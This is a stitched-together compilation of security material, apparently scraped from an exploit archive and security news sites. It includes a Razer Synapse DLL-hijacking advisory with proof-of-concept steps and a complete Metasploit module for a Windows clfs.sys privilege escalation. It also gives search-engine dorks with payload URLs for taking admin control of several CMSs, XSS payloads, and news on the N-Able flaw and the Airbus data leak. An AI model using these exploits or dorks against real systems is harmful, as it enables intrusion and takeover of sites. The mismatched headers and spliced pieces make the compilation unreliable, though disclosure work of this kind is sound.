Razer Synapse through 3.7.1209.121307 allows privilege escalation due to an unsafe installation path and improper privilege management. Attackers can place DLLs into %PROGRAMDATA%\Razer\Synapse3\Service\bin if they do so before the service is installed and if they deny write access for the SYSTEM user. Although the service will not start if it detects malicious DLLs in this directory, attackers can exploit a race condition and replace a valid DLL (i.e., a copy of a legitimate Razer DLL) with a malicious DLL after the service has already checked the file. As a result, local Windows users can abuse the Razer driver installer to obtain administrative privileges on Windows.

\-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2023-002 Product: Razer Synapse Manufacturer: Razer Inc. Affected Version(s): Versions before 3.8.0428.042117 (20230601) Tested Version(s): 3.8.0228.022313 (20230315) under Windows 10 Pro (10.0.19044) under Windows 11 Home (10.0.22621) Vulnerability Type: Improper Privilege Management (CWE-269) Time-of-check Time-of-use Race Condition (CWE-367) Risk Level: High Solution Status: Fixed Manufacturer Notification: 2023-03-23 Solution Date: 2023-04-28 Public Disclosure: 2023-08-31 CVE Reference: CVE-2022-47631 Author of Advisory: Dr. Oliver Schwarz, SySS GmbH ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: Razer Synapse is an additional driver software for Razer gaming devices. The manufacturer describes the product as a "unified cloud-based hardware configuration tool" (see \[1\]). Due to an unsafe installation path, improper privilege management, and a time-of-check time-of-use race condition, the associated system service "Razer Synapse Service" is vulnerable to DLL hijacking. As a result, local Windows users can abuse the Razer driver installer to obtain administrative privileges on Windows. In order to exploit the vulnerability, the attacker needs physical access to the machine and needs to prepare the attack before Razer Synapse is installed along with a Razer driver. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: The attack scenario considers a Windows machine without any previous installation of any Razer device or software. The attacker has a local unprivileged Windows account, physical access to the machine, and a device which is either a Razer peripheral or able to pretend to be one (such as a Bash Bunny or a Raspberry Pi Zero). The attacker aims at executing code with full system privileges. The attack exploits the Razer Synapse Service which runs with elevated privileges. While the main binary of the service is stored in the protected location "C:\\Program Files (x86)\\Razer\\Synapse3\\Service", it dynamically loads libraries from "C:\\ProgramData\\Razer\\Synapse3\\Service\\bin". Before the installation, standard users can write to this path, since "C:\\ProgramData" is world-writable on a standard installation of Windows. The Synapse installation procedure changes access privileges, so that standard users cannot write to the path any longer. However, if the path is created before the driver installation, the creator can set own files to be read-only and deny write access for the SYSTEM user. Upon start, the Synapse service checks the location for foreign DLLs, removes them, and aborts upon failure to delete them. However, due to a time-of-check time-of-use race condition, attackers can replace a benign DLL after it has been checked and before it is loaded. Note that the described vulnerability is similar to CVE-2021-44226 (SYSS-2021-058) and CVE-2022-47632 (SYSS-2022-047), which Razer Inc. fixed in March and September of 2022, respectively. The new attack differs from the earlier ones in that the attacker now has to exploit a race condition. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): The attack consists of the following steps: 1. Before the installation of the driver/Synapse, the attacker creates "C:\\ProgramData\\Razer\\Synapse3\\Service\\bin", copies a custom malicious version of userenv.dll into the directory, sets the DLL to read-only, and denies write access for SYSTEM. 2. Afterwards, the attacker triggers the installation of Synapse. This can be done without any elevated privileges by plugging in a Razer device and following the installation procedure for Synapse if device-specific co-installers are not disabled. Alternatively, a device such as Bash Bunny or a Raspberry Pi Zero can be used and pretend to be a Razer device. 3. With the help of a script, the attacker monitors the installation progress. As soon as legitimate DLL files show up in the directory, the attacker temporarily overwrites the malicious DLL with a legitimate one, waits for the DLL to be assessed (i.e., read), and then quickly copies back the malicious content to the DLL before it is actually loaded and executed. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: Razer has published a patched version that will be deployed automatically upon driver installation on current Windows builds. To prevent similar attacks through other co-installers, system administrators can disable them by setting the following key in the Windows registry: HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Device Installer\\DisableCoInstallers = 1 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2022-12-19: Vulnerability discovered 2023-03-23: Vulnerability reported to manufacturer 2023-04-28: Patch released by manufacturer 2023-08-31: Public disclosure of vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: \[1\] Product website for Razer Synapse 3 https://www2.razer.com/eu-en/synapse-3 \[2\] SySS Security Advisory SYSS-2023-002 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2023-002.txt \[3\] SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy \[4\] SySS Proof of Concept Video https://youtu.be/0myDcqmtt0U ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Dr. Oliver Schwarz of SySS GmbH. E-Mail: oliver.schwarz@syss.de Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Oliver\_Schwarz.asc Key ID: 0x9716294F1294280D Key Fingerprint: D452 B014 E992 2886 E799 6B43 9716 294F 1294 280D ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS Web site. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: https://creativecommons.org/licenses/by/3.0/deed.en -----BEGIN PGP SIGNATURE----- iQIzBAEBCgAdFiEE1FKwFOmSKIbnmWtDlxYpTxKUKA0FAmTsprkACgkQlxYpTxKU KA2+ehAAh0McQFUxuHHBPDlUmhoWLI+iOfTu7sGmJQLmHA5OToLnvCmz1Eqal7C2 B1G3IR8S9wvj5Ah2TFQdCAg0s4+WL+LmvhcxjL2t2Iq8hVd9v/kWFfx4N95YfA3f CveZRfFbMLgPN18pyKN41J5K1JjDj7HEHNYGOD/s5PsevM1tMwgQCz4PB/dAZcVj 0NkiiadD+xpe03H9S4H5DxyY10k1xt4vFNo2KObEfTnBPTNWte8VG7C7NNLSnqhS uQDR4wFrDQ2AT03im8ErN4ymXljohPVOTmIS8mvSrC72r6S0OD395Fm8FBW3qirg Y5y2YQsWbtbMLtGcOB4aRRQhS3QAUkmGG64vd+Wfg7/a/ntjMM9TPzmWDAQbHkLf mZihJlO4VNY8pSrQRx66bfodDffMBm0Jb0ArLL+/EktbpyGsGx18W2CXmYLVj0B7 FOUoHbNRoecSDnrx8PrhiQOgnmVhC0fw5IKoFZSmRLPNFOZQKUWR0T3kpYL83nUT VzGfSY0ZC+d41hWTJwv7Jqf/qKSt274T5GVZklkWEBaR0tabEwwfG2jLZnlxTja+ X2bTVh013HjeltVXeJCMWQrqJrlr52AZNQQYRNBU5EWlkm9itsmHyOsbe0o04yvn cQIjjiwYi1Rao0irOHG+sv5m/FgDpXm+FzcjGhptLAHPU5MC0uc= =TecR -----END PGP SIGNATURE-----

CVE-2022-47631

A privilege escalation vulnerability exists in the clfs.sys driver which comes installed by default on Windows 10 21H2, Windows 11 21H2 and Windows Server 20348 operating systems. This Metasploit module exploit makes use to two different kinds of specially crafted .blf files.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Local  Rank = GoodRanking  include Msf::Exploit::Local::WindowsKernel  include Msf::Post::File  include Msf::Post::Windows::Priv  include Msf::Post::Windows::Process  include Msf::Post::Windows::ReflectiveDLLInjection  prepend Msf::Exploit::Remote::AutoCheck  include Msf::Post::Windows::Version  def initialize(info = {})    super(      update_info(        info,        {          'Name' => 'Windows Common Log File System Driver (clfs.sys) Elevation of Privilege Vulnerability',          'Description' => %q{            A privilege escalation vulnerability exists in the clfs.sys driver which comes installed by default on            Windows 10 21H2, Windows 11 21H2 and Windows Server 20348 operating systems.            The clfs.sys driver contains a function CreateLogFile that is used to create            open and edit '*.blf' (base log format) files. Inside a .blf file there are multiple blocks of data which            contain checksums to verify the integrity of the .blf file and to ensure the file looks and acts like a            .blf file. However, these files can be edited with CreateFileA or with fopen and then modified with            WriteFile or fwrite respectively in order to change the contents of the file and update their checksums accordingly.            This exploit makes use to two different kinds of specially crafted .blf files that are edited using the technique            mentioned above. There are multiple spray .blf files. The spray .blf files are specially crafted to initiate an out of            bounds read which reads from a contiguous block of memory. The block of memory it reads from contains a read-write pipe            that points to the address of the second type of .blf file - the trigger .blf file. The trigger .blf file is specially            crafted read the SYSTEM token and write it in the process of the exploit to achieve the local privilege escalation.            The exploits creates a controlled memory space by first looping over the CreatePipe function to            to create thousands of read-write pipes (which take up 0x90 bytes of memory). It then releases a certain number of            pipes from memory and calls CreateLogFile to open the pre-existing spray .blf files which when being opened fill the            0x90 byte gaps created by the deallocation of the pipes in memory, creating the controlled memory space.            This is a very brief and high overview description of what the exploit is actually doing. For a more detailed and in            depth analysis please refer to the following [reference](https://github.com/fortra/CVE-2023-28252).          },          'License' => MSF_LICENSE,          'Author' => [            'Ricardo Narvaja',    # Original PoC (@ricnar456)            'Esteban.kazimirow',  # Original PoC (@solidclt)            'jheysel-r7'          # msf module          ],          'Arch' => [ ARCH_X64 ],          'Platform' => 'win',          'SessionTypes' => [ 'meterpreter' ],          'DefaultOptions' => {            'EXITFUNC' => 'thread'          },          'Targets' => [            [ 'Windows x64', { 'Arch' => ARCH_X64 } ]          ],          'References' => [            [ 'CVE', '2023-28252' ],            [ 'URL', 'https://github.com/fortra/CVE-2023-28252' ]          ],          'DisclosureDate' => '2023-04-11',          'DefaultTarget' => 0,          'Privileged' => true,          'Notes' => {            'Stability' => [CRASH_SAFE],            'Reliability' => [UNRELIABLE_SESSION], # Should always return a session on the first run but after that a session is not guaranteed            'SideEffects' => []          },          'Compat' => {            'Meterpreter' => {              'Commands' => %w[                stdapi_railgun_api              ]            }          }        }      )    )  end  def check    unless session.platform == 'windows'      # Non-Windows systems are definitely not affected.      return Exploit::CheckCode::Safe    end    file_path = get_env('WINDIR') + '\\system32\\drivers\\clfs.sys'    unless file?(file_path)      return Exploit::CheckCode::Safe('The target system does not have clfs.sys in system32\\drivers\\')    end    version = get_version_info    if version.build_number.between?(Msf::WindowsVersion::Win10_20H2, Msf::WindowsVersion::Win10_21H2) || version.build_number == Msf::WindowsVersion::Win11_21H2 || version.build_number == Msf::WindowsVersion::Server2022      return CheckCode::Appears("The target is running windows version: #{version.build_number} which has a vulnerable version of clfs.sys installed by default")    end    CheckCode::Safe  end  def exploit    if is_system?      fail_with(Failure::None, 'Session is already elevated')    end    if sysinfo['Architecture'] == ARCH_X64 && session.arch == ARCH_X86      fail_with(Failure::NoTarget, 'Running against WOW64 is not supported')    elsif sysinfo['Architecture'] == ARCH_X64 && target.arch.first == ARCH_X86      fail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86')    elsif sysinfo['Architecture'] == ARCH_X86 && target.arch.first == ARCH_X64      fail_with(Failure::NoTarget, 'Session host is x86, but the target is specified as x64')    end    encoded_payload = payload.encoded    execute_dll(      ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-28252', 'CVE-2023-28252.x64.dll'),      [encoded_payload.length].pack('I<') + encoded_payload    )    print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')  endend

Windows Common Log File System Driver (clfs.sys) Privilege Escalation

iSmile Soft CMS version 0.3.0 suffers from an add administrator vulnerability.

    ====================================================================================================================================| # Title     : iSmile Soft CMS v0.3.0 Add Admin Vulnerability                                                                     || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : https://www.helpernt.com/                                                                                          || # Dork      : JamalCom هذا السكربت مبرمج بواسطة                                                                                  |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] The installation file allows you to re-install the script and add a new manager, and the reason is due to the designer.     It is not recommended to delete the installation folder, and the user does not pay attention to deleting the installation file.[+] use payload : /install.php?etape=3[+] http://127.0.0.1/iSmile/install.php?etape=3Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

iSmile Soft CMS 0.3.0 Add Administrator

islamnt CMS version 2.1.0 suffers from an add administrator vulnerability.

    ====================================================================================================================================| # Title     : islamnt CMS v2.1.0 Add ADmin Vulnerability Vulnerability                                                           || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit)                                             || # Vendor    : https://sourceforge.net/projects/islam-cms/                                                                        |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] The installation file allows you to re-install the script and add a new manager, and the reason is due to the designer.     It is not recommended to delete the installation folder, and the user does not pay attention to deleting the installation file.[+] Use payload : /install/?action=setup7[+] http://127.0.0.1/Islam/install/?action=setup7Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

islamnt CMS 2.1.0 Add Administrator

islamnt CMS version 2.1.0 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : islamnt CMS v2.1.0 XSS Vulnerability Vulnerability                                                                 || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit)                                             || # Vendor    : https://sourceforge.net/projects/islam-cms/                                                                        || # Dork      : Powered By Islamnt 2.1.0                                                                                           |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : /onlines.php/%27onmouseover=%27prompt%28984627%29%27bad=%27%3E[+] http://127.0.0.1/Islam/onlines.php/%27onmouseover=%27prompt%28984627%29%27bad=%27%3EGreetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

islamnt CMS 2.1.0 Cross Site Scripting

Night Club Booking Software version 1.0 suffers from a cross site scripting vulnerability.

    ## Title: Night Club Booking Software-1.0 XSS-Reflected## Author: nu11secur1ty## Date: 09/09/2023## Vendor: https://www.phpjabbers.com/## Software: https://www.phpjabbers.com/night-club-booking-software/#sectionDemo## Reference: https://portswigger.net/web-security/cross-site-scripting/reflected## Description:The value of the index request parameter is copied into the value of anHTML tag attribute which is encapsulated in double quotation marks. Thepayload byymt"><script>alert(1)</script>fs5xr was submitted in the indexparameter. This input was echoed unmodified in the application's response.The attacker can trick the victim into executing arbitrary commands orcode on his machine remotely.STATUS: HIGH-CRITICAL Vulnerability[+]Test Payload:```GET/1694244800_322/index.php?controller=pjFront&action=pjActionSearch&session_id=&locale=1&index=6254byymt%22%3e%3cscript%3ealert(1)%3c%2fscript%3efs5xr&date=HTTP/1.1Host: demo.phpjabbers.comAccept-Encoding: gzip, deflateAccept: */*Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/116.0.5845.141 Safari/537.36Connection: closeCache-Control: max-age=0Cookie: _ga=GA1.2.825432071.1694256178; _gid=GA1.2.1157015144.1694256178;_gat=1; _fbp=fb.1.1694256177815.1029224882X-Requested-With: XMLHttpRequestReferer: https://demo.phpjabbers.com/1694244800_322/preview.php?lid=1Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="116","Chromium";v="116"Sec-CH-UA-Platform: WindowsSec-CH-UA-Mobile: ?0```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/Night-Club-Booking-Software-1.0)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2023/09/night-club-booking-software-10-xss.html)## Time spent:00:05:00

Night Club Booking Software 1.0 Cross Site Scripting

ImgHosting version 1.3 suffers from a cross site scripting vulnerability.

**ImgHosting 1.3 Cross Site Scripting**

Posted Sep 14, 2023

Authored by indoushka

ImgHosting version 1.3 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | 8c169afaf39b32fa5c563194367feecff6f19735b337600d64caa7b0f3c6b6a3

Download | Favorite | View

**ImgHosting 1.3 Cross Site Scripting**

    ====================================================================================================================================| # Title     : ImgHosting v1.3 XSS Vulnerability                                                                                  || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0(32-bit)                                               | | # Vendor    : https://codecanyon.net/user/FoxSash/?ref=FoxSash                                                                   |  | # Dork      : "ImgHosting  Programming by FoxSash"                                                                               |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : ?search=<marquee><font color=lime size=32>Hacked by indoushka</font></marquee>[+] http://www.127.0.0.1/pikhostingcom/?search=<marquee><font color=lime size=32>Hacked by indoushka</font></marquee>Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (82,202)
*   Arbitrary (16,255)
*   BBS (2,859)
*   Bypass (1,744)
*   CGI (1,027)
*   Code Execution (7,302)
*   Conference (680)
*   Cracker (842)
*   CSRF (3,348)
*   DoS (23,535)
*   Encryption (2,371)
*   Exploit (52,098)
*   File Inclusion (4,228)
*   File Upload (977)
*   Firewall (821)
*   Info Disclosure (2,792)
*   Intrusion Detection (894)
*   Java (3,049)
*   JavaScript (860)
*   Kernel (6,732)
*   Local (14,499)
*   Magazine (586)
*   Overflow (12,707)
*   Perl (1,423)
*   PHP (5,153)
*   Proof of Concept (2,343)
*   Protocol (3,606)
*   Python (1,536)
*   Remote (30,859)
*   Root (3,591)
*   Rootkit (509)
*   Ruby (612)
*   Scanner (1,641)
*   Security Tool (7,897)
*   Shell (3,195)
*   Shellcode (1,216)
*   Sniffer (895)
*   Spoof (2,209)
*   SQL Injection (16,411)
*   TCP (2,407)
*   Trojan (687)
*   UDP (893)
*   Virus (666)
*   Vulnerability (31,829)
*   Web (9,695)
*   Whitepaper (3,751)
*   x86 (962)
*   XSS (17,999)
*   Other

**File Archives**

*   September 2023
*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,005)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,925)
*   Debian (6,835)
*   Fedora (1,692)
*   FreeBSD (1,244)
*   Gentoo (4,323)
*   HPUX (879)
*   iOS (352)
*   iPhone (108)
*   IRIX (220)
*   Juniper (68)
*   Linux (46,701)
*   Mac OS X (687)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (485)
*   RedHat (13,853)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,907)
*   UNIX (9,308)
*   UnixWare (186)
*   Windows (6,585)
*   Other

ImgHosting 1.3 Cross Site Scripting

A high-severity security flaw has been disclosed in N-Able's Take Control Agent that could be exploited by a local unprivileged attacker to gain SYSTEM privileges.
Tracked as CVE-2023-27470 (CVSS score: 8.8), the issue relates to a Time-of-Check to Time-of-Use (TOCTOU) race condition vulnerability, which, when successfully exploited, could be leveraged to delete arbitrary files on a Windows

A high-severity security flaw has been disclosed in N-Able's Take Control Agent that could be exploited by a local unprivileged attacker to gain SYSTEM privileges.

Tracked as **CVE-2023-27470** (CVSS score: 8.8), the issue relates to a Time-of-Check to Time-of-Use (TOCTOU) race condition vulnerability, which, when successfully exploited, could be leveraged to delete arbitrary files on a Windows system.

The security shortcoming, which impacts versions 7.0.41.1141 and prior, has been addressed in version 7.0.43 released on March 15, 2023, following responsible disclosure by Mandiant on February 27, 2023.

Time-of-Check to Time-of-Use falls under a category of software flaws wherein a program checks the state of a resource for a specific value, but that value changes before it's actually used, effectively invalidating the results of the check.

An exploitation of such a flaw can result in a loss of integrity and trick the program into performing actions that it shouldn't otherwise, permitting a threat actor to gain access to otherwise unauthorized resources.

"This weakness can be security-relevant when an attacker can influence the state of the resource between check and use," according to a description of the Common Weakness Enumeration (CWE) system. "This can happen with shared resources such as files, memory, or even variables in multithreaded programs."

According to the Google-owned threat intelligence firm, CVE-2023-27470 arises from a TOCTOU race condition in the Take Control Agent (BASupSrvcUpdater.exe) between logging multiple file deletion events (e.g., files named aaa.txt and bbb.txt) and each delete action from a specific folder named "C:\\ProgramData\\GetSupportService\_N-Central\\PushUpdates."

"To put it simply, while BASupSrvcUpdater.exe logged the deletion of aaa.txt, an attacker could swiftly replace the bbb.txt file with a symbolic link, redirecting the process to an arbitrary file on the system," Mandiant security researcher Andrew Oliveau said.

UPCOMING WEBINAR

Identity is the New Endpoint: Mastering SaaS Security in the Modern Age

Dive deep into the future of SaaS security with Maor Bin, CEO of Adaptive Shield. Discover why identity is the new endpoint. Secure your spot now.

Supercharge Your Skills

"This action would cause the process to unintentionally delete files as NT AUTHORITY\\SYSTEM."

Even more troublingly, this arbitrary file deletion could be weaponized to secure an elevated Command Prompt by taking advantage of a race condition attack targeting the Windows installer's rollback functionality, potentially leading to code execution.

"Arbitrary file deletion exploits are no longer limited to \[denial-of-service attacks and can indeed serve as a means to achieve elevated code execution," Oliveau said, adding such exploits can be combined with "MSI's rollback functionality to introduce arbitrary files into the system."

"A seemingly innocuous process of logging and deleting events within an insecure folder can enable an attacker to create pseudo-symlinks, deceiving privileged processes into running actions on unintended files."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

N-Able's Take Control Agent Vulnerability Exposes Windows Systems to Privilege Escalation


A Privilege escalation vulnerability exists in Trellix Windows DLP endpoint for windows which can be abused to delete any file/folder for which the user does not have permission to.



CVE-2023-4814

In December 2022, KrebsOnSecurity broke the news that a cybercriminal using the handle "USDoD" had infiltrated the FBI's vetted information sharing network InfraGard, and was selling the contact information for all 80,000 members. The FBI responded by reverifying all InfraGard members and by seizing the cybercrime forum where the data was being sold. But on Sept. 11, 2023, USDoD resurfaced after a lengthy absence to leak sensitive employee data stolen from the aerospace giant Airbus, while promising to visit the same treatment on top U.S. defense contractors.

In December 2022, KrebsOnSecurity broke the news that a cybercriminal using the handle “**USDoD**” had infiltrated the **FBI**‘s vetted information sharing network **InfraGard**, and was selling the contact information for all 80,000 members. The FBI responded by reverifying InfraGard members and by seizing the cybercrime forum where the data was being sold. But on Sept. 11, 2023, USDoD resurfaced after a lengthy absence to leak sensitive employee data stolen from the aerospace giant **Airbus**, while promising to visit the same treatment on top U.S. defense contractors.

USDoD’s avatar used to be the seal of the U.S. Department of Defense. Now it’s a charming kitten.

In a post on the English language cybercrime forum **BreachForums**, USDoD leaked information on roughly 3,200 Airbus vendors, including names, addresses, phone numbers, and email addresses. USDoD claimed they grabbed the data by using passwords stolen from a Turkish airline employee who had third-party access to Airbus’ systems.

USDoD didn’t say why they decided to leak the data on the 22nd anniversary of the 9/11 attacks, but there was definitely an aircraft theme to the message that accompanied the leak, which concluded with the words, “Lockheed martin, Raytheon and the entire defense contractos \[sic\], I’m coming for you \[expletive\].”

Airbus has apparently confirmed the cybercriminal’s account to the threat intelligence firm **Hudson Rock**, which determined that the Airbus credentials were stolen after a Turkish airline employee infected their computer with a prevalent and powerful info-stealing trojan called **RedLine**.

Info-stealers like RedLine typically are deployed via opportunistic email malware campaigns, and by secretly bundling the trojans with cracked versions of popular software titles made available online. Credentials stolen by info-stealers often end up for sale on cybercrime shops that peddle purloined passwords and authentication cookies (these logs also often show up in the malware scanning service VirusTotal).

Hudson Rock said it recovered the log files created by a RedLine infection on the Turkish airline employee’s system, and found the employee likely infected their machine after downloading pirated and secretly backdoored software for Microsoft Windows.

Hudson Rock says info-stealer infections from RedLine and a host of similar trojans have surged in recent years, and that they remain “a primary initial attack vector used by threat actors to infiltrate organizations and execute cyberattacks, including ransomware, data breaches, account overtakes, and corporate espionage.”

The prevalence of RedLine and other info-stealers means that a great many consequential security breaches begin with cybercriminals abusing stolen employee credentials. In this scenario, the attacker temporarily assumes the identity and online privileges assigned to a hacked employee, and the onus is on the employer to tell the difference.

In addition to snarfing any passwords stored on or transmitted through an infected system, info-stealers also siphon authentication cookies or tokens that allow one to remain signed-in to online services for long periods of time without having to resupply one’s password and multi-factor authentication code. By stealing these tokens, attackers can often reuse them in their own web browser, and bypass any authentication normally required for that account.

**Microsoft Corp.** this week acknowledged that a China-backed hacking group was able to steal one of the keys to its email kingdom that granted near-unfettered access to U.S. government inboxes. Microsoft’s detailed post-mortem cum mea culpa explained that a secret signing key was stolen from an employee in an unlucky series of unfortunate events, and thanks to TechCrunch we now know that the culprit once again was “token-stealing malware” on the employee’s system.

In April 2023, the FBI seized Genesis Market, a bustling, fully automated cybercrime store that was continuously restocked with freshly hacked passwords and authentication tokens stolen by a network of contractors who deployed RedLine and other info-stealer malware.

In March 2023, the FBI arrested and charged the alleged administrator of BreachForums (aka Breached), the same cybercrime community where USDoD leaked the Airbus data. In June 2023, the FBI seized the BreachForums domain name, but the forum has since migrated to a new domain.

USDoD’s InfraGard sales thread on Breached.

Unsolicited email continues to be a huge vector for info-stealing malware, but lately the crooks behind these schemes have been gaming the search engines so that their malicious sites impersonating popular software vendors actually appear before the legitimate vendor’s website. So take special care when downloading software to ensure that you are in fact getting the program from the original, legitimate source whenever possible.

Also, unless you _really_ know what you’re doing, please don’t download and install pirated software. Sure, the cracked program might do exactly what you expect it to do, but the chances are good that it is also laced with something nasty. And when all of your passwords are stolen and your important accounts have been hijacked or sold, you will wish you had simply paid for the real thing.

Tag

#windows